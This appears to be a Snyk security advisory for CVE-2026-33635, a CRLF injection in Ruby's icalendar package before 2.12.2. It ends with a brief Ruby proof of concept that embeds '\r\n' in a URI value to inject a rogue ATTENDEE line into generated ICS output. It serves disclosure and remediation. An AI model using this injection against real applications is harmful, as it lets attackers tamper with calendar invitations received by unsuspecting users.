CRLF Injection Affecting icalendar package, versions >=2.0.0, <2.12.2
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-RUBY-ICALENDAR-15763540
- published25 Mar 2026
- disclosed24 Mar 2026
- creditWes Ring
Introduced: 24 Mar 2026
NewCVE-2026-33635 (opens in a new tab)How to fix?
Upgrade icalendar to version 2.12.2 or higher.
Overview
icalendar is an Implements the iCalendar specification (RFC-5545) in Ruby. This allows for the generation and parsing of .ics files, which are used by a variety of calendaring applications.
Affected versions of this package are vulnerable to CRLF Injection via the serialization process of URI property values due to improper sanitization of input. An attacker can inject arbitrary calendar lines into generated ICS files by supplying input containing CRLF characters, which are embedded directly into the output and interpreted as new properties or components by downstream calendar clients.
PoC
require "icalendar/value"
require "icalendar/values/uri"
v = Icalendar::Values::Uri.new("https://a.example/ok\r\nATTENDEE:mailto:evil@example.com")
puts v.to_ical(Icalendar::Values::Text)